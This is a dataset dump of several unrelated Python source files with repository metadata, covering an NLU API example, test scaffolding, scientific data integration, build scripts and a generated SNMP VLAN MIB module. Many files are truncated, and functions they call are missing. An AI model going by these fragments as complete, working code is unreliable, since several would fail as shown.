] | 22 | 2015-02-26T09:07:18.000Z | 2020-05-10T16:22:05.000Z | Python/ComplexPaths02/src/main/MainModule01.py | tduoth/JsObjects | eb3e2a8b1f47d0da53c8b1a85a7949269711932f | [
"MIT"
] | 123 | 2016-04-05T18:32:41.000Z | 2022-03-13T21:09:21.000Z | Python/ComplexPaths02/src/main/MainModule01.py | tduoth/JsObjects | eb3e2a8b1f47d0da53c8b1a85a7949269711932f | [
"MIT"
] | 56 | 2015-03-19T22:26:37.000Z | 2021-12-06T02:52:02.000Z | '''
Created on May 26, 2012
@author: Charlie
''' | 13.222222 | 27 | 0.613445 |
7753e7fec1d5a58812ddcacb76ec8e3307a0b943 | 2,109 | py | Python | examples/image_dataset_create.py | praekelt/feersum-nlu-api-wrappers | 6580e2bab2c8a764fe868a505330b3fee6029074 | [
"BSD-3-Clause"
] | 9 | 2017-10-10T12:24:23.000Z | 2021-08-18T14:07:51.000Z | examples/image_dataset_create.py | praekelt/feersum-nlu-api-wrappers | 6580e2bab2c8a764fe868a505330b3fee6029074 | [
"BSD-3-Clause"
] | 1 | 2020-12-06T11:03:25.000Z | 2021-04-14T05:21:23.000Z | examples/image_dataset_create.py | praekelt/feersum-nlu-api-wrappers | 6580e2bab2c8a764fe868a505330b3fee6029074 | [
"BSD-3-Clause"
] | 2 | 2019-02-12T08:26:06.000Z | 2022-02-01T09:39:47.000Z | """ Example: Shows how to create and use an image dataset. """
import urllib3
import feersum_nlu
from feersum_nlu.rest import ApiException
from examples import feersumnlu_host, feersum_nlu_auth_token
# from feersum_nlu_util import image_utils
# Configure API key authorization: APIKeyHeader
configuration = feersum_nlu.Configuration()
# configuration.api_key['AUTH_TOKEN'] = feersum_nlu_auth_token
configuration.api_key['X-Auth-Token'] = feersum_nlu_auth_token # Alternative auth key header!
configuration.host = feersumnlu_host
api_instance = feersum_nlu.ImageDatasetsApi(feersum_nlu.ApiClient(configuration))
instance_name = 'labelled_images_1'
create_details = feersum_nlu.ImageDatasetCreateDetails(name=instance_name,
desc=instance_name,
load_from_store=False)
caller_name = 'example_caller'
print()
try:
print("Create the image dataset:")
api_response = api_instance.image_dataset_create(create_details)
print(" type(api_response)", type(api_response))
print(" api_response", api_response)
print()
print("Get the details of specific named loaded image dataset:")
api_response = api_instance.image_dataset_get_details(instance_name)
print(" type(api_response)", type(api_response))
print(" api_response", api_response)
print()
# print("Delete named loaded image dataset:")
# api_response = api_instance.image_dataset_del(instance_name)
# print(" type(api_response)", type(api_response))
# print(" api_response", api_response)
# print()
#
# print("Vaporise named loaded image dataset:")
# api_response = api_instance.image_dataset_vaporise(instance_name)
# print(" type(api_response)", type(api_response))
# print(" api_response", api_response)
# print()
except ApiException as e:
print("Exception when calling a image dataset operation: %s\n" % e)
except urllib3.exceptions.HTTPError as e:
print("Connection HTTPError! %s\n" % e)
| 35.745763 | 95 | 0.699384 |
775402adbd62e329a7b317ab8391c40e03b9d6e5 | 2,536 | py | Python | tests/test_resource_base.py | neteler/actinia_statistic_plugin | 428d191830bb59a8927fde68fd1e4439331fef97 | [
"MIT"
] | 3 | 2018-10-16T14:32:07.000Z | 2020-03-24T18:07:02.000Z | tests/test_resource_base.py | neteler/actinia_statistic_plugin | 428d191830bb59a8927fde68fd1e4439331fef97 | [
"MIT"
] | 7 | 2019-10-01T07:46:52.000Z | 2022-03-24T09:26:53.000Z | tests/test_resource_base.py | neteler/actinia_statistic_plugin | 428d191830bb59a8927fde68fd1e4439331fef97 | [
"MIT"
] | 4 | 2018-10-26T11:52:09.000Z | 2020-03-24T18:07:03.000Z | # -*- coding: utf-8 -*-
import atexit
import os
import signal
import time
from flask_restful import Api
from actinia_core.testsuite import ActiniaTestCaseBase, URL_PREFIX
from actinia_core.core.common.config import global_config
from actinia_core.core.common.app import flask_app, flask_api
from actinia_statistic_plugin.endpoints import create_endpoints
from actinia_core.endpoints import create_endpoints as create_actinia_endpoints
__license__ = "GPLv3"
__author__ = "Sren Gebbert"
__copyright__ = "Copyright 2016-2019, Sren Gebbert"
__maintainer__ = "Sren Gebbert"
__email__ = "soerengebbert@googlemail.com"
redis_pid = None
server_test = False
custom_actinia_cfg = False
create_actinia_endpoints()
create_endpoints(flask_api)
# If this environmental variable is set, then a real http request will be send
# instead of using the flask test_client.
if "ACTINIA_SERVER_TEST" in os.environ:
server_test = bool(os.environ["ACTINIA_SERVER_TEST"])
# Set this variable to use a actinia config file in a docker container
if "ACTINIA_CUSTOM_TEST_CFG" in os.environ:
custom_actinia_cfg = str(os.environ["ACTINIA_CUSTOM_TEST_CFG"])
# Register the redis stop function
atexit.register(stop_redis)
# Setup the environment
setup_environment()
| 32.512821 | 79 | 0.742902 |
7755642e2df8bfea6999683ed9d91b14f6530187 | 5,560 | py | Python | interpreter/code/tests/test_basic.py | yunkai123/my-500lines-notes | 60fd3b18919b5bcb90ddece9e088c1c152438972 | [
"MIT"
] | null | null | null | interpreter/code/tests/test_basic.py | yunkai123/my-500lines-notes | 60fd3b18919b5bcb90ddece9e088c1c152438972 | [
"MIT"
] | null | null | null | interpreter/code/tests/test_basic.py | yunkai123/my-500lines-notes | 60fd3b18919b5bcb90ddece9e088c1c152438972 | [
"MIT"
] | null | null | null | """ Byterund """
import vmtest | 25.62212 | 55 | 0.380935 |
7756950ec6fb5c1205ec5e03552facad7a4cc3ac | 387 | py | Python | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | 3 | 2021-06-20T02:24:10.000Z | 2022-01-26T23:55:33.000Z | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from importlib import import_module
| 27.642857 | 57 | 0.731266 |
77576a10d402216d2e59b9e687478fa26a161c83 | 10,503 | py | Python | genesis/objects/integrate.py | leifdenby/uclales-extractor | 6147533e25b3b417c744bd814d2407a6588cf995 | [
"BSD-3-Clause"
] | null | null | null | genesis/objects/integrate.py | leifdenby/uclales-extractor | 6147533e25b3b417c744bd814d2407a6588cf995 | [
"BSD-3-Clause"
] | null | null | null | genesis/objects/integrate.py | leifdenby/uclales-extractor | 6147533e25b3b417c744bd814d2407a6588cf995 | [
"BSD-3-Clause"
] | null | null | null | import os
import warnings
import xarray as xr
import numpy as np
# forget about using dask for now, dask_ndmeasure takes a huge amount of memory
# try:
# # raise ImportError
# # import dask_ndmeasure as ndimage
# # register a progressbar so we can see progress of dask'ed operations with xarray
# from dask.diagnostics import ProgressBar
# ProgressBar().register()
# except ImportError:
# from scipy import ndimage
# warnings.warn("Using standard serial scipy implementation instead of "
# "dask'ed dask-ndmeasure. Install `dask-ndmeasure` for much "
# "faster computation")
from scipy.constants import pi
from tqdm import tqdm
import dask_image.ndmeasure
from . import integral_properties
from . import minkowski_scales
from ..utils import find_grid_spacing
CHUNKS = 200 # forget about using dask for now, np.unique is too slow
FN_OUT_FORMAT = "{base_name}.objects.{objects_name}.integral.{name}.nc"
def integrate(objects, variable, operator=None, **kwargs):
"""
Integrate over the labelled objects in `objects` the variable (named by a
string, .e.g `r_equiv` would be the equivalent spherical radius). Can also
integrate for example a scalar field provided through an extra kwarg to
find for example the maximum value.
Available variables:
{avail_vars}
Calculating equivalent radius for each object:
>> integrate(da_objects, variable='r_equiv')
Calculate the maximum value of vertical velocity for each object
>> integrate(da_objects, variable='w', operator='maximum', w=da_w)
Calculate the volume integral of water vapour for each object
>> integrate(da_objects, variable='q', operator='volume_integral', q=ds.q)
"""
ds_out = None
if variable in objects.coords:
da_scalar = objects.coords[variable]
elif variable == "com_angles":
fn_int = integral_properties.calc_com_incline_and_orientation_angle
ds_out = _integrate_per_object(da_objects=objects, fn_int=fn_int)
elif hasattr(integral_properties, "calc_{}__dask".format(variable)):
fn_int = getattr(integral_properties, "calc_{}__dask".format(variable))
da_objects = objects
if "xt" in da_objects.dims:
da_objects = da_objects.rename(xt="x", yt="y", zt="z")
ds_out = fn_int(da_objects)
try:
ds_out.name = variable
except AttributeError:
# we can't actually set the name of a dataset, this only works with
# data arrays
pass
elif hasattr(integral_properties, "calc_{}".format(variable)):
fn_int = getattr(integral_properties, "calc_{}".format(variable))
ds_out = _integrate_per_object(da_objects=objects, fn_int=fn_int)
try:
ds_out.name = variable
except AttributeError:
# we can't actually set the name of a dataset, this only works with
# data arrays
pass
# XXX: volume is actually calculated by the minkowski routines which have
# been verified against those below (keeping in case I forget)
# elif variable == 'volume':
# dx = find_grid_spacing(objects)
# da_scalar = xr.DataArray(
# np.ones_like(objects, dtype=np.float),
# coords=objects.coords, attrs=dict(units='1')
# )
# da_scalar.name = 'volume'
elif variable in [
"length_m",
"width_m",
"thickness_m",
"genus_m",
"volume",
"num_cells",
"filamentarity",
"planarity",
]:
ds_minkowski = minkowski_scales.main(da_objects=objects)
ds_out = ds_minkowski[variable]
elif variable == "r_equiv":
da_volume = integrate(objects, "volume", operator="sum")
# V = 4/3 pi r^3 => r = (3/4 V/pi)**(1./3.)
da_scalar = (3.0 / (4.0 * pi) * da_volume) ** (1.0 / 3.0)
da_scalar.attrs["units"] = "m"
da_scalar.attrs["long_name"] = "equivalent sphere radius"
da_scalar.name = "r_equiv"
ds_out = da_scalar
elif variable in kwargs and operator in [
"volume_integral",
"maximum",
"maximum_pos_z",
"mean",
"sum",
]:
da_scalar = kwargs[variable].squeeze()
if not objects.zt.equals(da_scalar.zt):
warnings.warn(
"Objects span smaller range than scalar field to "
"reducing domain of scalar field"
)
da_scalar = da_scalar.sel(zt=objects.zt)
# ds_out = _integrate_scalar(objects=objects.squeeze(),
# da=da_scalar,
# operator=operator)
import ipdb
with ipdb.launch_ipdb_on_exception():
ds_out = _integrate_scalar(objects=objects, da=da_scalar, operator=operator)
else:
if operator:
raise NotImplementedError(
f"Don't know how to calculate `{operator}` of `{variable}` with fields"
f"{', '.join(kwargs.keys())}`"
)
else:
raise NotImplementedError(
"Don't know how to calculate `{}`" "".format(variable)
)
# else:
# fn_scalar = "{}.{}.nc".format(base_name, variable)
# if not os.path.exists(fn_scalar):
# raise Exception("Couldn't find scalar file `{}`".format(fn_scalar))
# da_scalar = xr.open_dataarray(
# fn_scalar, decode_times=False, chunks=CHUNKS
# ).squeeze()
if ds_out is None:
if objects.zt.max() < da_scalar.zt.max():
warnings.warn(
"Objects span smaller range than scalar field to "
"reducing domain of scalar field"
)
zt_ = da_scalar.zt.values
da_scalar = da_scalar.sel(zt=slice(None, zt_[25]))
ds_out = _integrate_scalar(objects=objects, da=da_scalar, operator=operator)
return ds_out
# hack to set docstring at runtime so we can include the available variables
integrate.__doc__ = integrate.__doc__.format(
avail_vars=", ".join(integral_properties.VAR_MAPPINGS.keys())
)
if __name__ == "__main__":
import argparse
argparser = argparse.ArgumentParser(__doc__)
argparser.add_argument("object_file")
argparser.add_argument("scalar_field")
argparser.add_argument("--operator", default="volume_integral", type=str)
args = argparser.parse_args()
object_file = args.object_file.replace(".nc", "")
op = args.operator
if "objects" not in object_file:
raise Exception()
base_name, objects_mask = object_file.split(".objects.")
fn_objects = "{}.nc".format(object_file)
if not os.path.exists(fn_objects):
raise Exception("Couldn't find objects file `{}`".format(fn_objects))
objects = xr.open_dataarray(fn_objects, decode_times=False, chunks=CHUNKS).squeeze()
name = make_name(
variable=args.scalar_field,
operator=op,
)
out_filename = FN_OUT_FORMAT.format(
base_name=base_name.replace("/", "__"), objects_name=objects.name, name=name
)
ds_out = integrate(
objects=objects, variable=args.scalar_field, operator=args.operator
)
import ipdb
with ipdb.launch_ipdb_on_exception():
ds_out.to_netcdf(out_filename)
print("Wrote output to `{}`".format(out_filename))
| 32.719626 | 88 | 0.63677 |
775775cc7a45c42108314eb9aa9a67d61fab3d99 | 181 | py | Python | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | from ann import *
x, y = utils.get_mnist_samples(100)
m = Model(x[0].shape)
m.add(Conv2D())
m.add(MaxPooling())
m.add(Flatten())
m.add(Dense(15))
m.add(Dense(10, a_func='sigmoid'))
| 20.111111 | 35 | 0.679558 |
77579ad9466e36640c85ebfa6cdc492815ea188c | 1,923 | py | Python | scripts/addon/generate_all.py | mozilla-releng/staging-mozilla-vpn-client | f31d3762a607ccf2d7c6a016f7b800305fbf0113 | [
"Apache-2.0"
] | null | null | null | scripts/addon/generate_all.py | mozilla-releng/staging-mozilla-vpn-client | f31d3762a607ccf2d7c6a016f7b800305fbf0113 | [
"Apache-2.0"
] | null | null | null | scripts/addon/generate_all.py | mozilla-releng/staging-mozilla-vpn-client | f31d3762a607ccf2d7c6a016f7b800305fbf0113 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import hashlib
import json
import os
import subprocess
import sys
parser = argparse.ArgumentParser(description="Generate an addon package")
parser.add_argument(
"-q",
"--qt_path",
default=None,
dest="qtpath",
help="The QT binary path. If not set, we try to guess.",
)
args = parser.parse_args()
build_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "build.py")
addons_path = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))),
"addons",
)
generated_path = os.path.join(addons_path, "generated")
if not os.path.isdir(generated_path):
os.mkdir(generated_path)
generated_path = os.path.join(generated_path, "addons")
if not os.path.isdir(generated_path):
os.mkdir(generated_path)
addons = []
for file in os.listdir(addons_path):
addon_path = os.path.join(addons_path, file, "manifest.json")
if not os.path.exists(addon_path):
print(f"Ignoring path {file}.")
continue
build_cmd = [sys.executable, build_path, addon_path, generated_path]
if args.qtpath:
build_cmd.append("-q")
build_cmd.append(args.qtpath)
subprocess.call(build_cmd)
generated_addon_path = os.path.join(generated_path, file + ".rcc")
if not os.path.exists(generated_addon_path):
exit(f"Expected addon file {generated_addon_path}")
with open(generated_addon_path,"rb") as f:
sha256 = hashlib.sha256(f.read()).hexdigest();
addons.append({ 'id': file, 'sha256': sha256 })
index = {
'api_version': '0.1',
'addons': addons,
}
with open(os.path.join(generated_path, "manifest.json"), "w") as f:
f.write(json.dumps(index, indent=2))
| 30.046875 | 82 | 0.696828 |
7758e5a6fe24718f7edc88625d84b3904624aa2d | 8,310 | py | Python | meson_test.py | tp-m/meson | 2d1aa395e86848ca948d30d83cc5357777e5b490 | [
"Apache-2.0"
] | null | null | null | meson_test.py | tp-m/meson | 2d1aa395e86848ca948d30d83cc5357777e5b490 | [
"Apache-2.0"
] | null | null | null | meson_test.py | tp-m/meson | 2d1aa395e86848ca948d30d83cc5357777e5b490 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2013-2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os, subprocess, time, datetime, pickle, multiprocessing, json
import concurrent.futures as conc
import argparse
import mesonlib
tests_failed = []
parser = argparse.ArgumentParser()
parser.add_argument('--wrapper', default=None, dest='wrapper',
help='wrapper to run tests with (e.g. valgrind)')
parser.add_argument('--wd', default=None, dest='wd',
help='directory to cd into before running')
parser.add_argument('--suite', default=None, dest='suite',
help='Only run tests belonging to this suite.')
parser.add_argument('args', nargs='+')
if __name__ == '__main__':
sys.exit(run(sys.argv[1:]))
| 36.28821 | 97 | 0.601685 |
77592dd99f28334c1a356341edde3b576368b416 | 1,085 | py | Python | 2020/d05_1.py | PaulWichser/adventofcode | 628d962a65188310af136c8b88acbdbd5dc94352 | [
"MIT"
] | null | null | null | 2020/d05_1.py | PaulWichser/adventofcode | 628d962a65188310af136c8b88acbdbd5dc94352 | [
"MIT"
] | null | null | null | 2020/d05_1.py | PaulWichser/adventofcode | 628d962a65188310af136c8b88acbdbd5dc94352 | [
"MIT"
] | null | null | null | import fileimp
# divide rows 0-127
# F = lower half
# B = upper half
# divide columns 0-7
# R = upper half
# L = lower half
# seat ID = row * 8 + col
# list of IDs
# max list
testlist = fileimp.listimp("d05_test.txt")
if max(idcalc(testlist)) != 820:
print("Test Failed!")
quit()
seatlist = fileimp.listimp("d05_input.txt")
print("Largest seat ID = ", max(idcalc(seatlist)))
| 22.604167 | 60 | 0.453456 |
7759ab5bb6b2419c0cf09ba0f8c0454651c021e4 | 3,618 | py | Python | src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py | mikehulluk/morphforge | 2a95096f144ed4ea487decb735ce66706357d3c7 | [
"BSD-2-Clause"
] | 1 | 2021-01-21T11:31:59.000Z | 2021-01-21T11:31:59.000Z | src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py | mikehulluk/morphforge | 2a95096f144ed4ea487decb735ce66706357d3c7 | [
"BSD-2-Clause"
] | null | null | null | src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py | mikehulluk/morphforge | 2a95096f144ed4ea487decb735ce66706357d3c7 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
from morphforge.core import PluginDict
from morphforge.simulation.base import SimulationEnvironment
from morphforge.simulation.base import CurrentClampStepChange
from morphforge.simulation.base import VoltageClampStepChange
from morphforge.simulation.neuron.core import NEURONSimulationSettings
from morphforge.simulation.neuron.networks import NEURONGapJunction
from morphforge.simulation.neuron.core import NEURONCell
from morphforge.simulation.neuron.core import NEURONSimulation
| 37.6875 | 75 | 0.725263 |
775a75fe1fae66dbea733bd14ae845c43584999a | 766 | py | Python | news_topic_modeling_service/backfill.py | rishavgiri6/News4U | d426eba97039a3d1afd90ecd14c454856b91f9d8 | [
"Unlicense"
] | 2 | 2021-08-02T09:41:42.000Z | 2021-08-10T05:26:52.000Z | news_topic_modeling_service/backfill.py | rishavgiri6/News4U | d426eba97039a3d1afd90ecd14c454856b91f9d8 | [
"Unlicense"
] | null | null | null | news_topic_modeling_service/backfill.py | rishavgiri6/News4U | d426eba97039a3d1afd90ecd14c454856b91f9d8 | [
"Unlicense"
] | null | null | null | import os
import sys
# import common package in parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import mongodb_client
import news_topic_modeling_service_client
if __name__ == '__main__':
db = mongodb_client.get_db()
cursor = db['news'].find({})
count = 0
for news in cursor:
count += 1
print(count)
if 'class' in news:
print('Populating classes...')
description = news['description']
if description is None:
description = news['title']
topic = news_topic_modeling_service_client.classify(description)
news['class'] = topic
db['news'].replace_one({'digest': news['digest']}, news, upsert=True)
| 30.64 | 81 | 0.620104 |
775cbe05f1e23d8b5ab980d33a068bbf4e214d9f | 2,559 | py | Python | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | from http.server import BaseHTTPRequestHandler,HTTPServer
from socketserver import ThreadingMixIn
import threading
import subprocess
import urllib.parse
# todo: factor out common server stuff
# todo: these should probably have limited
# access to files, so something like only
# uploads dir may be good.
# then there is slight problem about
# possibility to optimize theme files
# for example (which should be done first,
# but it'd be convenient to reuse this.)
# Maybe allow to mount a theme path
# Collecting args, stripping quotes string for
# it to work with subprocess.Popen
# Assuming only single quoted strings
if __name__ == '__main__':
print('Imagemagick server starts')
httpd = ThreadingSimpleServer(('0.0.0.0', 1345), Handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Imagemagick server stops')
| 30.831325 | 66 | 0.5932 |
775d1ff6bf052dcb5d8a678cb806eb618f0ebf92 | 26,692 | py | Python | pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module GENERIC-3COM-VLAN-MIB-1-0-7 (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/GENERIC-3COM-VLAN-MIB-1-0-7
# Produced by pysmi-0.3.4 at Wed May 1 11:09:00 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Counter32, Integer32, ObjectIdentity, Counter64, IpAddress, MibIdentifier, iso, ModuleIdentity, Unsigned32, Gauge32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, enterprises = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Counter32", "Integer32", "ObjectIdentity", "Counter64", "IpAddress", "MibIdentifier", "iso", "ModuleIdentity", "Unsigned32", "Gauge32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "enterprises")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
a3Com = MibIdentifier((1, 3, 6, 1, 4, 1, 43))
generic = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10))
genExperimental = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1))
genVirtual = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14))
a3ComVlanGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1))
a3ComVlanProtocolsGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2))
a3ComVirtualGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 3))
a3ComEncapsulationGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4))
a3ComVlanGlobalMappingTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1), )
if mibBuilder.loadTexts: a3ComVlanGlobalMappingTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingTable.setDescription('This table lists VLAN interfaces that are globally identified. A single entry exists in this list for each VLAN interface in the system that is bound to a global identifier.')
a3ComVlanGlobalMappingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanGlobalMappingIdentifier"))
if mibBuilder.loadTexts: a3ComVlanGlobalMappingEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingEntry.setDescription('An individual VLAN interface global mapping entry. Entries in this table are created by setting the a3ComVlanIfGlobalIdentifier object in the a3ComVlanIfTable to a non-zero value.')
a3ComVlanGlobalMappingIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535)))
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIdentifier.setDescription('An index into the a3ComVlanGlobalMappingTable and an administratively assigned global VLAN identifier. The value of this object globally identifies the VLAN interface. For VLAN interfaces, on different network devices, which are part of the same globally identified VLAN, the value of this object will be the same.')
a3ComVlanGlobalMappingIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIfIndex.setDescription('The value of a3ComVlanIfIndex for the VLAN interface in the a3ComVlanIfTable, which is bound to the global identifier specified by this entry.')
a3ComVlanIfTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2), )
if mibBuilder.loadTexts: a3ComVlanIfTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfTable.setDescription('This table lists VLAN interfaces that exist within a device. A single entry exists in this list for each VLAN interface in the system. A VLAN interface may be created, destroyed and/or mapped to a globally identified vlan.')
a3ComVlanIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanIfIndex"))
if mibBuilder.loadTexts: a3ComVlanIfEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfEntry.setDescription('An individual VLAN interface entry. When an NMS wishes to create a new entry in this table, it must obtain a non-zero index from the a3ComNextAvailableVirtIfIndex object. Row creation in this table will fail if the chosen index value does not match the current value returned from the a3ComNextAvailableVirtIfIndex object.')
a3ComVlanIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfIndex.setDescription("The index value of this row and the vlan's ifIndex in the ifTable. The NMS obtains the index value for this row by reading the a3ComNextAvailableVirtIfIndex object.")
a3ComVlanIfDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfDescr.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfDescr.setDescription('This is a description of the VLAN interface.')
a3ComVlanIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 3), A3ComVlanType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfType.setDescription('The VLAN interface type.')
a3ComVlanIfGlobalIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfGlobalIdentifier.setStatus('mandatory')
